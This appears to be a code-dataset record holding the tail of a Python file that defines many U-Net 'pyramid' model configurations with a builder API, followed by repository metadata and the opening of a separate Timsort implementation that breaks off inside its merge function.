ch032_pyramid_1side_4__2side_1__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_1__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
######### 2s2
##### 3s1
### 4s1
ch032_pyramid_1side_4__2side_2__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_2__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s2
### 4s1
ch032_pyramid_1side_4__2side_2__3side_2_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_2__3side_2_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_4__2side_2__3side_2_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_2__3side_2_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_2__3side_2_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_2__3side_2_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_2__3side_2_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_2__3side_2_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
######### 2s3
##### 3s1
### 4s1
ch032_pyramid_1side_4__2side_3__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s2
### 4s1
ch032_pyramid_1side_4__2side_3__3side_2_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_2_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_4__2side_3__3side_2_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_2_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_3__3side_2_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_2_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_3__3side_2_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_2_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s3
### 4s1
ch032_pyramid_1side_4__2side_3__3side_3_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_4__2side_3__3side_3_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_3__3side_3_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_3__3side_3_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s3
ch032_pyramid_1side_4__2side_3__3side_3_4side_3_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_3_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_3__3side_3_4side_3_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_3_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_3__3side_3_4side_3_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_3_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_3__3side_3_4side_3_5s3_6s3, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
######### 2s4
##### 3s1
### 4s1
ch032_pyramid_1side_4__2side_4__3side_1_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_1_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s2
### 4s1
ch032_pyramid_1side_4__2side_4__3side_2_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_2_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_4__2side_4__3side_2_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_2_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_2_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_2_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_2_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_2_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s3
### 4s1
ch032_pyramid_1side_4__2side_4__3side_3_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_4__2side_4__3side_3_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_3_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_3_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s3
ch032_pyramid_1side_4__2side_4__3side_3_4side_3_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_3_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_3_4side_3_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_3_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_3_4side_3_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_3_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_3_4side_3_5s3_6s3, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
##### 3s4
### 4s1
ch032_pyramid_1side_4__2side_4__3side_4_4side_1_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_1_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s2
ch032_pyramid_1side_4__2side_4__3side_4_4side_2_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_2_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_2_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_2_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_2_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_2_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s3
ch032_pyramid_1side_4__2side_4__3side_4_4side_3_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_3_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_3_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_3_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_3_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_3_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_3_5s3_6s3, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
### 4s4
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s1_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s1_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s2_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s2_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s2_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s2_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s3_6s3, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s1, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s2, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s3, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
ch032_pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s4 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch=use_hid_ch, depth_level=3, out_ch=1, d_amount=2, bottle_divide=True, unet_acti="sigmoid", conv_block_num=pyramid_1side_4__2side_4__3side_4_4side_4_5s4_6s4, ch_upper_bound= 2 ** 14).set_gen_op( use_what_gen_op ).set_train_step( use_what_train_step )
###############################################################################################################################################################################################
###############################################################################################################################################################################################
if(__name__ == "__main__"):
import numpy as np
print("build_model cost time:", time.time() - start_time)
data = np.zeros(shape=(1, 512, 512, 1), dtype=np.float32)
use_model = ch032_pyramid_1side_1__2side_1__3side_1_4side_1_5s1_6s1
use_model = use_model.build()
result = use_model.generator(data)
print(result[0].shape)
from kong_util.tf_model_util import Show_model_weights
Show_model_weights(use_model.generator)
use_model.generator.summary()
print(use_model.model_describe)
|
[
"s89334roy@yahoo.com.tw"
] |
s89334roy@yahoo.com.tw
|
55143682fca9a5a372684fe6877e0b9819391f5a
|
b83ce8d7edc345c8db38902d08c9b3b6f1ef054c
|
/new_timsort.py
|
1536f80a958be00f7c4705a437c94509544f8037
|
[] |
no_license
|
OlegLaiok/cs102
|
2078e9ee1b3fb766a49f93c1817ed550c272d7f7
|
76d2b6a5ebb88b0a5825c3a2f375c8be38cc5637
|
refs/heads/master
| 2020-08-06T00:02:00.689435
| 2020-06-27T13:40:56
| 2020-06-27T13:40:56
| 212,763,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,794
|
py
|
import random
def GetMinrun(n: int):
r = 0 # станет 1 если среди сдвинутых битов будет хотя бы 1 ненулевой */
while (n >= 64):
r |= n & 1
n >>= 1
return n + r
def InsSort(arr, start, end):
for i in range(start+1, end+1):
elem = arr[i]
j = i-1
while j >= start and elem < arr[j]:
arr[j+1] = arr[j]
j -= 1
arr[j+1] = elem
return arr
def merge(arr, start, mid, end):
if mid == end:
return arr
first = arr[start:mid+1]
